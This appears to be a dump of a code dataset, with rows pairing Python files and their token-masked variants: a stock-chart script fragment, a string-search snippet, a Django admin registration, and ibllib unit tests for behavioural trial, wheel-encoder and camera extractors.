owned_stocks_graph_data[owned_stocks[i]['stock']]=owned_stocks[i]['total_worth']\n\nlength=len(owned_stocks_graph_data);\nsorted_data=sorted(owned_stocks_graph_data.items(),key=operator.itemgetter(1))\n\n\nfor i in range(length-1,-1,-1):\n if(length-i>MAX):break\n sorted_owned_stocks_chart_axis.append(sorted_data[i][0])\n sorted_owned_stocks_chart_value.append(sorted_data[i][1])\n\ndata['owned_stocks_chart_axis']=sorted_owned_stocks_chart_axis;\ndata['owned_stocks_chart_value']=sorted_owned_stocks_chart_value;\n\njson_result = json.dumps(data)\nprint json_result\n\n \n" ]
true
62
5c30b0e952ddf2e05a7ad5f8d9bbd4f5e22f887d
# strspn(str1,str2) str1 = '12345678' str2 = '456' # str1 and chars both in str1 and str2 print(str1 and str2) str1 = 'cekjgdklab' str2 = 'gka' nPos = -1 for c in str1: if c in str2: nPos = str1.index(c) break print(nPos)
[ "# strspn(str1,str2)\nstr1 = '12345678'\nstr2 = '456'\n# str1 and chars both in str1 and str2\nprint(str1 and str2)\n\nstr1 = 'cekjgdklab'\nstr2 = 'gka'\nnPos = -1\nfor c in str1:\n if c in str2:\n nPos = str1.index(c)\n break\nprint(nPos)\n", "str1 = '12345678'\nstr2 = '456'\nprint(str1 and str2)\nstr1 = 'cekjgdklab'\nstr2 = 'gka'\nnPos = -1\nfor c in str1:\n if c in str2:\n nPos = str1.index(c)\n break\nprint(nPos)\n", "<assignment token>\nprint(str1 and str2)\n<assignment token>\nfor c in str1:\n if c in str2:\n nPos = str1.index(c)\n break\nprint(nPos)\n", "<assignment token>\n<code token>\n<assignment token>\n<code token>\n" ]
false
63
a86b64ccd0dab4ab70ca9c2b7625fb34afec3794
from django.contrib import admin from django_summernote.admin import SummernoteModelAdmin from .models import ArticlePost # Register your models here. class SomeModelAdmin(SummernoteModelAdmin): # instead of ModelAdmin summernote_fields = '__all__' admin.site.register(ArticlePost, SummernoteModelAdmin)
[ "from django.contrib import admin\nfrom django_summernote.admin import SummernoteModelAdmin\nfrom .models import ArticlePost\n# Register your models here.\n\nclass SomeModelAdmin(SummernoteModelAdmin): # instead of ModelAdmin\n summernote_fields = '__all__'\n\nadmin.site.register(ArticlePost, SummernoteModelAdmin)", "from django.contrib import admin\nfrom django_summernote.admin import SummernoteModelAdmin\nfrom .models import ArticlePost\n\n\nclass SomeModelAdmin(SummernoteModelAdmin):\n summernote_fields = '__all__'\n\n\nadmin.site.register(ArticlePost, SummernoteModelAdmin)\n", "<import token>\n\n\nclass SomeModelAdmin(SummernoteModelAdmin):\n summernote_fields = '__all__'\n\n\nadmin.site.register(ArticlePost, SummernoteModelAdmin)\n", "<import token>\n\n\nclass SomeModelAdmin(SummernoteModelAdmin):\n summernote_fields = '__all__'\n\n\n<code token>\n", "<import token>\n\n\nclass SomeModelAdmin(SummernoteModelAdmin):\n <assignment token>\n\n\n<code token>\n", "<import token>\n<class token>\n<code token>\n" ]
false
64
f17d33f1d035da42dc9a2b4c0c60beefc6a48dea
import functools import shutil import tempfile import unittest import unittest.mock from pathlib import Path import numpy as np import pandas as pd import one.alf.io as alfio from ibllib.io.extractors import training_trials, biased_trials, camera from ibllib.io import raw_data_loaders as raw from ibllib.io.extractors.base import BaseExtractor def wheelMoves_fixture(func): """Decorator to save some dummy wheelMoves ALF files for extraction tests""" @functools.wraps(func) def wrapper(obj=None): # Save some wheelMoves ALF files attr_list = ['training_lt5', 'training_ge5', 'biased_lt5', 'biased_ge5'] alf_paths = [getattr(obj, p)['path'] / 'alf' for p in attr_list] n_trials = [getattr(obj, p)['ntrials'] for p in attr_list] for p, n in zip(alf_paths, n_trials): p.mkdir() np.save(str(p / '_ibl_wheelMoves.intervals.npy'), np.zeros((n, 2))) np.save(str(p / '_ibl_wheelMoves.peakAmplitude.npy'), np.zeros(n)) # Run method func(obj) # Teardown; delete the files for p in alf_paths: shutil.rmtree(p) return wrapper class TestExtractTrialData(unittest.TestCase): def setUp(self): self.main_path = Path(__file__).parent self.training_lt5 = {'path': self.main_path / 'data' / 'session_training_lt5'} self.biased_lt5 = {'path': self.main_path / 'data' / 'session_biased_lt5'} self.training_ge5 = {'path': self.main_path / 'data' / 'session_training_ge5'} self.biased_ge5 = {'path': self.main_path / 'data' / 'session_biased_ge5'} self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5['path'])) self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])) self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5['path'])) self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])) # turn off logging for unit testing as we will purposedly go into warning/error cases self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5' self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5' # Save some dummy wheel moves data for trial firstMovement_times extraction def test_get_feedbackType(self): # TRAINING SESSIONS ft = training_trials.FeedbackType( self.training_lt5['path']).extract()[0] self.assertEqual(ft.size, self.training_lt5['ntrials']) # check if no 0's in feedbackTypes self.assertFalse(ft[ft == 0].size > 0) # -- version >= 5.0.0 ft = training_trials.FeedbackType( self.training_ge5['path']).extract()[0] self.assertEqual(ft.size, self.training_ge5['ntrials']) # check if no 0's in feedbackTypes self.assertFalse(ft[ft == 0].size > 0) # BIASED SESSIONS ft = biased_trials.FeedbackType( self.biased_lt5['path']).extract()[0] self.assertEqual(ft.size, self.biased_lt5['ntrials']) # check if no 0's in feedbackTypes self.assertFalse(ft[ft == 0].size > 0) # -- version >= 5.0.0 ft = biased_trials.FeedbackType( self.biased_ge5['path']).extract()[0] self.assertEqual(ft.size, self.biased_ge5['ntrials']) # check if no 0's in feedbackTypes self.assertFalse(ft[ft == 0].size > 0) def test_get_contrastLR(self): # TRAINING SESSIONS cl, cr = training_trials.ContrastLR( self.training_lt5['path']).extract()[0] self.assertTrue(all([np.sign(x) >= 0 for x in cl if ~np.isnan(x)])) self.assertTrue(all([np.sign(x) >= 0 for x in cr if ~np.isnan(x)])) self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl)) self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl)) # -- version >= 5.0.0 cl, cr = training_trials.ContrastLR( self.training_ge5['path']).extract()[0] self.assertTrue(all([np.sign(x) >= 0 for x in cl if ~np.isnan(x)])) self.assertTrue(all([np.sign(x) >= 0 for x in cr if ~np.isnan(x)])) self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl)) self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl)) # BIASED SESSIONS cl, cr = biased_trials.ContrastLR( self.biased_lt5['path']).extract()[0] self.assertTrue(all([np.sign(x) >= 0 for x in cl if ~np.isnan(x)])) self.assertTrue(all([np.sign(x) >= 0 for x in cr if ~np.isnan(x)])) self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl)) self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl)) # -- version >= 5.0.0 cl, cr = biased_trials.ContrastLR( self.biased_ge5['path']).extract()[0] self.assertTrue(all([np.sign(x) >= 0 for x in cl if ~np.isnan(x)])) self.assertTrue(all([np.sign(x) >= 0 for x in cr if ~np.isnan(x)])) self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl)) self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl)) def test_get_probabilityLeft(self): # TRAINING SESSIONS pl = training_trials.ProbabilityLeft( self.training_lt5['path']).extract()[0] self.assertTrue(isinstance(pl, np.ndarray)) # -- version >= 5.0.0 pl = training_trials.ProbabilityLeft( self.training_ge5['path']).extract()[0] self.assertTrue(isinstance(pl, np.ndarray)) # BIASED SESSIONS pl = biased_trials.ProbabilityLeft( self.biased_lt5['path']).extract()[0] self.assertTrue(isinstance(pl, np.ndarray)) # Test if only probs that are in prob set md = raw.load_settings(self.biased_lt5['path']) if md: probs = md['BLOCK_PROBABILITY_SET'] probs.append(0.5) self.assertTrue(sum([x in probs for x in pl]) == len(pl)) # -- version >= 5.0.0 pl = biased_trials.ProbabilityLeft( self.biased_ge5['path']).extract()[0] self.assertTrue(isinstance(pl, np.ndarray)) # Test if only probs that are in prob set md = raw.load_settings(self.biased_ge5['path']) probs = md['BLOCK_PROBABILITY_SET'] probs.append(0.5) self.assertTrue(sum([x in probs for x in pl]) == len(pl)) def test_get_choice(self): # TRAINING SESSIONS choice = training_trials.Choice( session_path=self.training_lt5['path']).extract(save=False)[0] self.assertTrue(isinstance(choice, np.ndarray)) data = raw.load_data(self.training_lt5['path']) trial_nogo = np.array( [~np.isnan(t['behavior_data']['States timestamps']['no_go'][0][0]) for t in data]) if any(trial_nogo): self.assertTrue(all(choice[trial_nogo]) == 0) # -- version >= 5.0.0 choice = training_trials.Choice( session_path=self.training_ge5['path']).extract(save=False)[0] self.assertTrue(isinstance(choice, np.ndarray)) data = raw.load_data(self.training_ge5['path']) trial_nogo = np.array( [~np.isnan(t['behavior_data']['States timestamps']['no_go'][0][0]) for t in data]) if any(trial_nogo): self.assertTrue(all(choice[trial_nogo]) == 0) # BIASED SESSIONS choice = biased_trials.Choice( session_path=self.biased_lt5['path']).extract(save=False)[0] self.assertTrue(isinstance(choice, np.ndarray)) data = raw.load_data(self.biased_lt5['path']) trial_nogo = np.array( [~np.isnan(t['behavior_data']['States timestamps']['no_go'][0][0]) for t in data]) if any(trial_nogo): self.assertTrue(all(choice[trial_nogo]) == 0) # -- version >= 5.0.0 choice = biased_trials.Choice( session_path=self.biased_ge5['path']).extract(save=False)[0] self.assertTrue(isinstance(choice, np.ndarray)) data = raw.load_data(self.biased_ge5['path']) trial_nogo = np.array( [~np.isnan(t['behavior_data']['States timestamps']['no_go'][0][0]) for t in data]) if any(trial_nogo): self.assertTrue(all(choice[trial_nogo]) == 0) def test_get_repNum(self): # TODO: Test its sawtooth # TRAINING SESSIONS rn = training_trials.RepNum( self.training_lt5['path']).extract()[0] self.assertTrue(isinstance(rn, np.ndarray)) for i in range(3): self.assertTrue(i in rn) # -- version >= 5.0.0 rn = training_trials.RepNum( self.training_ge5['path']).extract()[0] self.assertTrue(isinstance(rn, np.ndarray)) for i in range(4): self.assertTrue(i in rn) # BIASED SESSIONS have no repeted trials def test_get_rewardVolume(self): # TRAINING SESSIONS rv = training_trials.RewardVolume( self.training_lt5['path']).extract()[0] self.assertTrue(isinstance(rv, np.ndarray)) # -- version >= 5.0.0 rv = training_trials.RewardVolume( self.training_ge5['path']).extract()[0] self.assertTrue(isinstance(rv, np.ndarray)) # BIASED SESSIONS rv = biased_trials.RewardVolume( self.biased_lt5['path']).extract()[0] self.assertTrue(isinstance(rv, np.ndarray)) # Test if all non zero rewards are of the same value self.assertTrue(all([x == max(rv) for x in rv if x != 0])) # -- version >= 5.0.0 rv = biased_trials.RewardVolume( self.biased_ge5['path']).extract()[0] self.assertTrue(isinstance(rv, np.ndarray)) # Test if all non zero rewards are of the same value self.assertTrue(all([x == max(rv) for x in rv if x != 0])) def test_get_feedback_times_ge5(self): # TRAINING SESSIONS ft = training_trials.FeedbackTimes( self.training_ge5['path']).extract()[0] self.assertTrue(isinstance(ft, np.ndarray)) # BIASED SESSIONS ft = biased_trials.FeedbackTimes( self.biased_ge5['path']).extract()[0] self.assertTrue(isinstance(ft, np.ndarray)) def test_get_feedback_times_lt5(self): # TRAINING SESSIONS ft = training_trials.FeedbackTimes( self.training_lt5['path']).extract()[0] self.assertTrue(isinstance(ft, np.ndarray)) # BIASED SESSIONS ft = biased_trials.FeedbackTimes( self.biased_lt5['path']).extract()[0] self.assertTrue(isinstance(ft, np.ndarray)) def test_get_stimOnTrigger_times(self): # TRAINING SESSIONS sott = training_trials.StimOnTriggerTimes( self.training_lt5['path']).extract()[0] self.assertTrue(isinstance(sott, np.ndarray)) # -- version >= 5.0.0 sott = training_trials.StimOnTriggerTimes( self.training_ge5['path']).extract()[0] self.assertTrue(isinstance(sott, np.ndarray)) # BIASED SESSIONS sott = biased_trials.StimOnTriggerTimes( self.biased_lt5['path']).extract()[0] self.assertTrue(isinstance(sott, np.ndarray)) # -- version >= 5.0.0 sott = biased_trials.StimOnTriggerTimes( self.biased_ge5['path']).extract()[0] self.assertTrue(isinstance(sott, np.ndarray)) def test_get_stimOn_times_lt5(self): # TRAINING SESSIONS st = training_trials.StimOnTimes_deprecated( self.training_lt5['path']).extract()[0] self.assertTrue(isinstance(st, np.ndarray)) # BIASED SESSIONS st = biased_trials.StimOnTimes_deprecated( self.biased_lt5['path']).extract()[0] self.assertTrue(isinstance(st, np.ndarray)) def test_get_stimOn_times_ge5(self): # TRAINING SESSIONS st = training_trials.StimOnTimes_deprecated( self.training_ge5['path']).extract()[0] self.assertTrue(isinstance(st, np.ndarray)) # BIASED SESSIONS st = biased_trials.StimOnTimes_deprecated( self.biased_ge5['path']).extract()[0] self.assertTrue(isinstance(st, np.ndarray)) def test_stimOnOffFreeze_times(self): # TRAINING SESSIONS st = training_trials.StimOnOffFreezeTimes( self.training_lt5['path']).extract()[0] self.assertTrue(isinstance(st[0], np.ndarray)) # BIASED SESSIONS st = biased_trials.StimOnOffFreezeTimes( self.biased_lt5['path']).extract()[0] self.assertTrue(isinstance(st[0], np.ndarray)) # TRAINING SESSIONS st = training_trials.StimOnOffFreezeTimes( self.training_ge5['path']).extract()[0] self.assertTrue(isinstance(st[0], np.ndarray)) # BIASED SESSIONS st = biased_trials.StimOnOffFreezeTimes( self.biased_ge5['path']).extract()[0] self.assertTrue(isinstance(st[0], np.ndarray)) def test_get_intervals(self): # TRAINING SESSIONS di = training_trials.Intervals( self.training_lt5['path']).extract()[0] self.assertTrue(isinstance(di, np.ndarray)) self.assertFalse(np.isnan(di).all()) # -- version >= 5.0.0 di = training_trials.Intervals( self.training_ge5['path']).extract()[0] self.assertTrue(isinstance(di, np.ndarray)) self.assertFalse(np.isnan(di).all()) # BIASED SESSIONS di = biased_trials.Intervals( self.training_lt5['path']).extract()[0] self.assertTrue(isinstance(di, np.ndarray)) self.assertFalse(np.isnan(di).all()) # -- version >= 5.0.0 di = biased_trials.Intervals( self.training_ge5['path']).extract()[0] self.assertTrue(isinstance(di, np.ndarray)) self.assertFalse(np.isnan(di).all()) def test_get_response_times(self): # TRAINING SESSIONS rt = training_trials.ResponseTimes( self.training_lt5['path']).extract()[0] self.assertTrue(isinstance(rt, np.ndarray)) # -- version >= 5.0.0 rt = training_trials.ResponseTimes( self.training_ge5['path']).extract()[0] self.assertTrue(isinstance(rt, np.ndarray)) # BIASED SESSIONS rt = biased_trials.ResponseTimes( self.biased_lt5['path']).extract()[0] self.assertTrue(isinstance(rt, np.ndarray)) # -- version >= 5.0.0 rt = biased_trials.ResponseTimes( self.biased_ge5['path']).extract()[0] self.assertTrue(isinstance(rt, np.ndarray)) def test_get_goCueTrigger_times(self): # TRAINING SESSIONS data = raw.load_data(self.training_lt5['path']) gct = np.array([tr['behavior_data']['States timestamps'] ['closed_loop'][0][0] for tr in data]) self.assertTrue(isinstance(gct, np.ndarray)) # -- version >= 5.0.0 gct = training_trials.GoCueTriggerTimes( self.training_ge5['path']).extract()[0] self.assertTrue(isinstance(gct, np.ndarray)) # BIASED SESSIONS data = raw.load_data(self.biased_lt5['path']) gct = np.array([tr['behavior_data']['States timestamps'] ['closed_loop'][0][0] for tr in data]) self.assertTrue(isinstance(gct, np.ndarray)) # -- version >= 5.0.0 gct = biased_trials.GoCueTriggerTimes( self.biased_ge5['path']).extract()[0] self.assertTrue(isinstance(gct, np.ndarray)) def test_get_goCueOnset_times(self): # TRAINING SESSIONS gcot = training_trials.GoCueTimes( self.training_lt5['path']).extract()[0] self.assertTrue(isinstance(gcot, np.ndarray)) self.assertTrue(np.all(np.isnan(gcot))) self.assertTrue(gcot.size != 0 or gcot.size == 4) # -- version >= 5.0.0 gcot = training_trials.GoCueTimes( self.training_ge5['path']).extract()[0] self.assertTrue(isinstance(gcot, np.ndarray)) self.assertFalse(np.any(np.isnan(gcot))) self.assertTrue(gcot.size != 0 or gcot.size == 12) # BIASED SESSIONS gcot = biased_trials.GoCueTimes( self.biased_lt5['path']).extract()[0] self.assertTrue(isinstance(gcot, np.ndarray)) self.assertFalse(np.any(np.isnan(gcot))) self.assertTrue(gcot.size != 0 or gcot.size == 4) # -- version >= 5.0.0 gcot = biased_trials.GoCueTimes( self.biased_ge5['path']).extract()[0] self.assertTrue(isinstance(gcot, np.ndarray)) self.assertFalse(np.any(np.isnan(gcot))) self.assertTrue(gcot.size != 0 or gcot.size == 8) def test_get_included_trials_lt5(self): # TRAINING SESSIONS it = training_trials.IncludedTrials( self.training_lt5['path']).extract()[0] self.assertTrue(isinstance(it, np.ndarray)) # BIASED SESSIONS it = biased_trials.IncludedTrials( self.biased_lt5['path']).extract()[0] self.assertTrue(isinstance(it, np.ndarray)) def test_get_included_trials_ge5(self): # TRAINING SESSIONS it = training_trials.IncludedTrials( self.training_ge5['path']).extract()[0] self.assertTrue(isinstance(it, np.ndarray)) # BIASED SESSIONS it = biased_trials.IncludedTrials( self.biased_ge5['path']).extract()[0] self.assertTrue(isinstance(it, np.ndarray)) def test_get_included_trials(self): # TRAINING SESSIONS it = training_trials.IncludedTrials( self.training_lt5['path']).extract(settings={'IBLRIG_VERSION_TAG': '4.9.9'})[0] self.assertTrue(isinstance(it, np.ndarray)) # -- version >= 5.0.0 it = training_trials.IncludedTrials( self.training_ge5['path']).extract()[0] self.assertTrue(isinstance(it, np.ndarray)) # BIASED SESSIONS it = biased_trials.IncludedTrials( self.biased_lt5['path']).extract(settings={'IBLRIG_VERSION_TAG': '4.9.9'})[0] self.assertTrue(isinstance(it, np.ndarray)) # -- version >= 5.0.0 it = biased_trials.IncludedTrials( self.biased_ge5['path']).extract()[0] self.assertTrue(isinstance(it, np.ndarray)) @wheelMoves_fixture def test_extract_all(self): # TRAINING SESSIONS # Expect an error raised because no wheel moves were present in test data with self.assertRaises(ValueError) as ex: training_trials.extract_all( self.training_lt5['path'], settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True) self.assertIn('_ibl_wheelMoves.intervals.npy appears to be empty', str(ex.exception)) # -- version >= 5.0.0 out, files = training_trials.extract_all(self.training_ge5['path'], save=True) self.assertEqual(19, len(out)) self.assertTrue(all(map(Path.exists, files))) # BIASED SESSIONS # The new trials extractor additionally extracts the wheel data and this fails for the < 5.0 # test data so we will stub the wheel extractor with unittest.mock.patch('ibllib.io.extractors.biased_trials.Wheel') as Wheel: Wheel.var_names = tuple() Wheel().extract.return_value = ({}, []) out, files = biased_trials.extract_all( self.biased_lt5['path'], settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True) self.assertEqual(15, len(out)) self.assertTrue(all(map(Path.exists, files))) # -- version >= 5.0.0 out, files = biased_trials.extract_all(self.biased_ge5['path'], save=True) self.assertEqual(19, len(out)) self.assertTrue(all(map(Path.exists, files))) def test_encoder_positions_clock_reset(self): # TRAINING SESSIONS # only for training? path = self.training_lt5['path'] / "raw_behavior_data" path = next(path.glob("_iblrig_encoderPositions.raw*.ssv"), None) dy = raw._load_encoder_positions_file_lt5(path) dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206, 1853979, 1859144]) self.assertTrue(np.all(np.diff(dy['re_ts']) > 0)) self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0)) def test_encoder_positions_clock_errors(self): # here we test for 2 kinds of file corruption that happen # 1/2 the first sample time is corrupt and absurdly high and should be discarded # 2/2 2 samples are swapped and need to be swapped backk path = self.biased_lt5['path'] / "raw_behavior_data" path = next(path.glob("_iblrig_encoderPositions.raw*.ssv"), None) dy = raw._load_encoder_positions_file_lt5(path) self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0)) # -- version >= 5.0.0 path = self.biased_ge5['path'] / "raw_behavior_data" path = next(path.glob("_iblrig_encoderPositions.raw*.ssv"), None) dy = raw._load_encoder_positions_file_ge5(path) self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0)) def test_wheel_folders(self): # the wheel folder contains other errors in bpod output that had to be addressed for wf in self.wheel_lt5_path.glob('_iblrig_encoderPositions*.raw*.ssv'): df = raw._load_encoder_positions_file_lt5(wf) self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0)) for wf in self.wheel_lt5_path.glob('_iblrig_encoderEvents*.raw*.ssv'): df = raw._load_encoder_events_file_lt5(wf) self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0)) for wf in self.wheel_ge5_path.glob('_iblrig_encoderPositions*.raw*.ssv'): df = raw._load_encoder_positions_file_ge5(wf) self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0)) for wf in self.wheel_ge5_path.glob('_iblrig_encoderEvents*.raw*.ssv'): df = raw._load_encoder_events_file_ge5(wf) self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0)) def test_load_encoder_positions(self): raw.load_encoder_positions(self.training_lt5['path'], settings={'IBLRIG_VERSION_TAG': '4.9.9'}) raw.load_encoder_positions(self.training_ge5['path']) raw.load_encoder_positions(self.biased_lt5['path'], settings={'IBLRIG_VERSION_TAG': '4.9.9'}) raw.load_encoder_positions(self.biased_ge5['path']) def test_load_encoder_events(self): raw.load_encoder_events(self.training_lt5['path'], settings={'IBLRIG_VERSION_TAG': '4.9.9'}) raw.load_encoder_events(self.training_ge5['path']) raw.load_encoder_events(self.biased_lt5['path'], settings={'IBLRIG_VERSION_TAG': '4.9.9'}) raw.load_encoder_events(self.biased_ge5['path']) def test_size_outputs(self): # check the output dimensions # VERSION >= 5.0.0 from ibllib.io.extractors.bpod_trials import extract_all extract_all(self.training_ge5['path']) trials = alfio.load_object(self.training_ge5['path'] / 'alf', object='trials') self.assertTrue(alfio.check_dimensions(trials) == 0) extract_all(self.biased_ge5['path']) trials = alfio.load_object(self.biased_ge5['path'] / 'alf', object='trials') self.assertTrue(alfio.check_dimensions(trials) == 0) # VERSION < 5.0.0 # for these test data there are no wheel moves so let's mock the output mock_data = { 'intervals': np.array([[0, 1], ]), 'peakAmplitude': np.array([1, 1]), 'peakVelocity_times': np.array([1, 1])} function_name = 'ibllib.io.extractors.training_wheel.extract_wheel_moves' # Training with unittest.mock.patch(function_name, return_value=mock_data): extract_all(self.training_lt5['path']) trials = alfio.load_object(self.training_lt5['path'] / 'alf', object='trials') self.assertTrue(alfio.check_dimensions(trials) == 0) # Biased with unittest.mock.patch(function_name, return_value=mock_data): extract_all(self.biased_lt5['path']) trials = alfio.load_object(self.biased_lt5['path'] / 'alf', object='trials') self.assertTrue(alfio.check_dimensions(trials) == 0) def tearDown(self): for f in self.main_path.rglob('_ibl_log.*.log'): f.unlink() [x.unlink() for x in self.training_lt5['path'].rglob('alf/*') if x.is_file()] [x.unlink() for x in self.biased_lt5['path'].rglob('alf/*') if x.is_file()] [x.unlink() for x in self.training_ge5['path'].rglob('alf/*') if x.is_file()] [x.unlink() for x in self.biased_ge5['path'].rglob('alf/*') if x.is_file()] [x.rmdir() for x in self.training_lt5['path'].rglob('alf/') if x.is_dir()] [x.rmdir() for x in self.biased_lt5['path'].rglob('alf/') if x.is_dir()] [x.rmdir() for x in self.training_ge5['path'].rglob('alf/') if x.is_dir()] [x.rmdir() for x in self.biased_ge5['path'].rglob('alf/') if x.is_dir()] class TestSyncWheelBpod(unittest.TestCase): def test_sync_bpod_bonsai_poor_quality_timestamps(self): sync_trials_robust = raw.sync_trials_robust drift_pol = np.array([11 * 1e-6, -20]) # bpod starts 20 secs before with 10 ppm drift np.random.seed(seed=784) t0_full = np.cumsum(np.random.rand(50)) + .001 t1_full = np.polyval(drift_pol, t0_full) + t0_full t0 = t0_full.copy() t1 = t1_full.copy() t0_, t1_ = sync_trials_robust(t0, t1) assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_) t0_, t1_ = sync_trials_robust(t0, t1[:-1]) assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_) t0_, t1_ = sync_trials_robust(t0, t1[1:]) assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_) t0_, t1_ = sync_trials_robust(t0[1:], t1) assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_) t0_, t1_ = sync_trials_robust(t0[:-1], t1) assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_) t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24)) assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_) t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24)) assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_) class TestWheelLoaders(unittest.TestCase): def setUp(self) -> None: self.main_path = Path(__file__).parent def test_encoder_events_corrupt(self): path = self.main_path.joinpath('data', 'wheel', 'lt5') for file_events in path.rglob('_iblrig_encoderEvents.raw.*'): dy = raw._load_encoder_events_file_lt5(file_events) self.assertTrue(dy.size > 6) path = self.main_path.joinpath('data', 'wheel', 'ge5') for file_events in path.rglob('_iblrig_encoderEvents.raw.*'): dy = raw._load_encoder_events_file_ge5(file_events) self.assertTrue(dy.size > 6) def test_encoder_positions_corrupts(self): path = self.main_path.joinpath('data', 'wheel', 'ge5') for file_position in path.rglob('_iblrig_encoderPositions.raw.*'): dy = raw._load_encoder_positions_file_ge5(file_position) self.assertTrue(dy.size > 18) path = self.main_path.joinpath('data', 'wheel', 'lt5') for file_position in path.rglob('_iblrig_encoderPositions.raw.*'): dy = raw._load_encoder_positions_file_lt5(file_position) self.assertTrue(dy.size > 18) class MockExtracor(BaseExtractor): save_names = ( "some_file.csv", "some_file.tsv", "some_file.ssv", "some_file.npy", ) var_names = ( "csv", "ssv", "tsv", "npy", ) def _extract(self, **kwargs) -> tuple: csv = pd.DataFrame([1, 2, 3]) ssv = pd.DataFrame([1, 2, 3]) tsv = pd.DataFrame([1, 2, 3]) npy = np.array([1, 2, 3]) return (csv, ssv, tsv, npy) class TestBaseExtractorSavingMethods(unittest.TestCase): def setUp(self) -> None: self.tempdir = tempfile.TemporaryDirectory() self.session_path = self.tempdir.name # self.addClassCleanup(tempdir.cleanup) # py3.8 self.mock_extractor = MockExtracor(self.session_path) def test_saving_method(self): data, paths = self.mock_extractor.extract(save=True) self.assertTrue(all([x.exists() for x in paths])) def tearDown(self): self.tempdir.cleanup() class TestCameraExtractors(unittest.TestCase): def test_groom_pin_state(self): # UNIT DATA fps = 60 t_offset = 39.4 ts = np.arange(0, 10, 1 / fps) + t_offset # Add drift ts += np.full_like(ts, 1e-4).cumsum() n_pulses = 2 pulse_width = 0.3 duty = 0.5 gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32), 'polarities': np.ones(n_pulses * 2, dtype=np.int32)} gpio['polarities'][1::2] = -1 aud_offset = 40. audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio['polarities']} for p in range(n_pulses): i = p * 2 rise = (pulse_width * p) + duty * p + 1 audio['times'][i] = aud_offset + rise audio['times'][i + 1] = audio['times'][i] + pulse_width rise += t_offset gpio['indices'][i] = np.where(ts > rise)[0][0] gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0] gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts) self.assertEqual(audio, audio_, 'Audio dict shouldn\'t be effected') np.testing.assert_array_almost_equal(ts_[:4], [40., 40.016667, 40.033333, 40.05]) # Broken TTLs + extra TTL delay = 0.08 pulse_width = 1e-5 t = audio['times'][0] + delay audio['times'] = np.sort(np.append(audio['times'], [t, t + pulse_width, 80])) audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32) audio['polarities'][1::2] = -1 gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff=5e-3) self.assertTrue(audio_['times'].size == gpio_['times'].size == 4) # One front shifted by a large amount audio['times'][4] -= 0.3 gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, tolerance=.1, min_diff=5e-3) self.assertTrue(np.all(gpio_['times'] == audio_['times'])) self.assertTrue(np.all(gpio_['times'] == np.array([41., 41.3]))) def test_attribute_times(self, display=False): # Create two timestamp arrays at two different frequencies tsa = np.linspace(0, 60, 60 * 4)[:60] # 240bpm tsb = np.linspace(0, 60, 60 * 3)[:45] # 180bpm tsa = np.sort(np.append(tsa, .4)) # Add ambiguous front tsb = np.sort(np.append(tsb, .41)) if display: from ibllib.plots import vertical_lines import matplotlib.pyplot as plt vertical_lines(tsb, linestyle=':', color='r', label='tsb') vertical_lines(tsa, linestyle=':', color='b', label='tsa') plt.legend() # Check with default args matches = camera.attribute_times(tsa, tsb) expected = np.array( [0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17, 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38, 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60] ) np.testing.assert_array_equal(matches, expected) self.assertEqual(matches.size, tsb.size) # Taking closest instead of first should change index of ambiguous front matches = camera.attribute_times(tsa, tsb, take='nearest') expected[np.r_[1:3]] = expected[1:3] + 1 np.testing.assert_array_equal(matches, expected) # Taking first after should exclude many pulses matches = camera.attribute_times(tsa, tsb, take='after') missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43] expected[missing] = -1 np.testing.assert_array_equal(matches, expected) # Lower tolerance matches = camera.attribute_times(tsa, tsb, tol=0.05) expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45, 49, 53, 57]) np.testing.assert_array_equal(matches[matches > -1], expected) # Remove injective assert matches = camera.attribute_times(tsa, tsb, injective=False, take='nearest') expected = np.array( [0, 2, 